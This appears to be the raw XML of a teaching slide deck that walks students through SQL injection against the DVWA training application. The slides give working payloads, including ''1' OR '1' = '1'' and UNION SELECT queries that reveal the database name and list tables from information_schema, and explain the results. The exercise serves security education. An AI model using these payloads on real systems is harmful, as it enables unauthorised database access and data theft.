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4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId22"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId23"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="588" r:id="rId6"/>
    <p:sldId id="590" r:id="rId7"/>
    <p:sldId id="592" r:id="rId8"/>
    <p:sldId id="593" r:id="rId9"/>
    <p:sldId id="617" r:id="rId10"/>
    <p:sldId id="618" r:id="rId11"/>
    <p:sldId id="599" r:id="rId12"/>
    <p:sldId id="608" r:id="rId13"/>
    <p:sldId id="609" r:id="rId14"/>
    <p:sldId id="610" r:id="rId15"/>
    <p:sldId id="612" r:id="rId16"/>
    <p:sldId id="613" r:id="rId17"/>
    <p:sldId id="614" r:id="rId18"/>
    <p:sldId id="615" r:id="rId19"/>
    <p:sldId id="611" r:id="rId20"/>
    <p:sldId id="589" r:id="rId21"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr marL="0" marR="0" indent="0" algn="l" defTabSz="384048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5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96012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192024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288036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384048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480060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576072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672084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768096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A7"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="D5D5D5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1pPr>
    <a:lvl2pPr indent="9601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2pPr>
    <a:lvl3pPr indent="19202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3pPr>
    <a:lvl4pPr indent="28803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4pPr>
    <a:lvl5pPr indent="384048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5pPr>
    <a:lvl6pPr indent="480060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6pPr>
    <a:lvl7pPr indent="57607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7pPr>
    <a:lvl8pPr indent="67208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8pPr>
    <a:lvl9pPr indent="76809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1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8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2" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914343" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371514" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828686" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285858" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743029" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200200" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365737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36B8-0D62-484F-93E4-80151EA1803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36B8-0D62-484F-93E4-80151EA1803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ECA311-B056-499C-A684-D976324BE2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9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36B8-0D62-484F-93E4-80151EA1803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94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"/>
            <a:ext cx="9144000" cy="685662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2" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914343" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371514" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828686" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285858" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743029" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200200" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657372" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Presenter name,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Date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B53CEA0-84B6-40FC-9BF0-E9BB2CE420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8" y="5517204"/>
            <a:ext cx="1199683" cy="12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97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5558" y="4737655"/>
            <a:ext cx="4617541" cy="1547191"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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Tw Cen MT" panose="020B0602020104020603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Presenter name, email</a:t>
            </a:r>
          </a:p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42207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36B8-0D62-484F-93E4-80151EA1803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E73390-54FE-4B8B-86EF-D69C1A458E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9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8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36B8-0D62-484F-93E4-80151EA1803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FEA4CD-8203-4671-9361-6AD83C597F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0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6"/>
            <a:ext cx="38862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6"/>
            <a:ext cx="38862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36B8-0D62-484F-93E4-80151EA1803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6C8E01-3872-4E16-9C83-EE5FDD81D7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1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3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2" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914343" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371514" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828686" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285858" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743029" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200200" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="36573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6"/>
            <a:ext cx="3868340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3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2" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914343" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371514" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828686" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285858" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743029" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200200" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365737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6"/>
            <a:ext cx="3887391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36B8-0D62-484F-93E4-80151EA1803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F657DD-31FB-4E3E-B410-7272C8A369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8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36B8-0D62-484F-93E4-80151EA1803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158A0D-6E20-4279-9ABF-70ACA4A7D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36B8-0D62-484F-93E4-80151EA1803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FEC2A6-D07B-41B9-8EBC-3E2F00534D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0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2" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914343" indent="0">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371514" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828686" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285858" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743029" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200200" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="36573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36B8-0D62-484F-93E4-80151EA1803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358432-4B87-4500-84D4-8F24853FD1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2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2" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914343" indent="0">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371514" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828686" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285858" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743029" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657372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2" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914343" indent="0">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371514" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828686" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285858" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743029" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200200" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365737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36B8-0D62-484F-93E4-80151EA1803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BBBE1-5C14-47DA-A358-B74E00D7082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8CE36C-EF6B-49DD-AB7F-99A11F211D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0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6"/>
            <a:ext cx="9144000" cy="6856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DF6416-982D-43C9-B401-568D3EF243C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7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676" r:id="rId13"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="91434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85" indent="-228585" algn="l" defTabSz="914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757" indent="-228585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2929" indent="-228585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101" indent="-228585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271" indent="-228585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443" indent="-228585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5" indent="-228585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6" indent="-228585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7" indent="-228585" algn="l" defTabSz="91434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2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3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4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6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8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9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00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72" algn="l" defTabSz="9143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DA0F91-F08B-4E38-9090-340ABDAD55C5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Injection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2106-FE52-4291-BA1E-26A0AACD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AD0E6-1918-43FF-9E28-CCD68F119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4786630" cy="3906024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Select the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In the ‘User ID:’ section, search for 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>User ID: 4 should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>Pablo Picasso</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Search for User ID: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>User ID: 1 should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Notice that the website is supposed to display the info like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ID, First Name, and then Surname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What if we want to be malicious?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99673-52D8-485A-9458-430952743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392" y="1027908"/>
            <a:ext cx="3692608" cy="2079972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376180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E157-EE2C-4A3E-BEEA-B8CF9EC3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21631-6A21-443D-A6D9-C93BD9C3C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748120"/>
            <a:ext cx="7123431" cy="4073560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Instead of entering just the user id, tack on another SQL command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>Search for:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1' OR '1' = '1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650">
              <a:latin typeface="Tw Cen MT"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>You should notice all of the users listed, why is that?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2025"/>
              <a:t>Instead of searching for an ID number, you are now</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2025"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2025"/>
              <a:t>  comparing each user ID to the statement ‘1 OR 1 = 1’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>would check that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1 = 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650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en-US" sz="1650"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OR 1 = 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>(Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650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en-US" sz="1650"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>would check that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2 = 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OR 1 = 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650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en-US" sz="1650"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>would check that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3 = 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OR 1 = 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2025"/>
              <a:t>These are OR statements which means just one part needs to be True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2025"/>
              <a:t>Thus, all statements will be True, so it will display all user data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tw Cen MT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BACBC4-DCE1-453E-B92D-67BA88867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907" y="456338"/>
            <a:ext cx="1622067" cy="2583563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69361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B1AA-385D-4177-B37F-6408AD9C3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3D5CD-9319-41E6-BA6C-E214DAB0F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692136"/>
            <a:ext cx="5507990" cy="3824744"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025"/>
              <a:t>Now, try to input your own command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>User ID:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>1' OR 1=1 UNION SELECT null, database()#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025"/>
              <a:t>Notice the last ‘Surname’ is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" b="1" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2025" b="1">
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>This executed the command database() to show us the database name!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>This tells us something about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>structure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> of the target database and we can begin to feel our way around the database to make sense of it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025"/>
              <a:t>This is how you can insert your own SQL commands!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9D1FFB-C6A3-4D39-BDEC-A0DE59E04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400" y="365127"/>
            <a:ext cx="2826296" cy="2717853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E2CF03-68C8-4B97-8BE8-D8012174B151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6977536" y="3399795"/>
            <a:ext cx="1973424" cy="3847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125" b="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Executed the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1125">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1125" b="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>command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F45CE2-30F5-4518-BAD5-8653A3D56827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6852933" y="3019415"/>
            <a:ext cx="856146" cy="36311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71447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99C5-E139-4BF3-BAE9-5F6FEFDA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3F4AD-B9EA-4E0A-9C1C-E22B576AB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635346"/>
            <a:ext cx="8271511" cy="38205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/>
            <a:r>
              <a:rPr lang="en-US" sz="2025"/>
              <a:t>Try the following command:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="733425" lvl="1" indent="-257175"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="19050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1' OR 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685165" lvl="1" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>’ is showing you all the information about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> databases on the MySQL server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="227965" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>Limit it to relevant information about the users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1' OR 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>      WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> LIKE ‘user%’ #</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
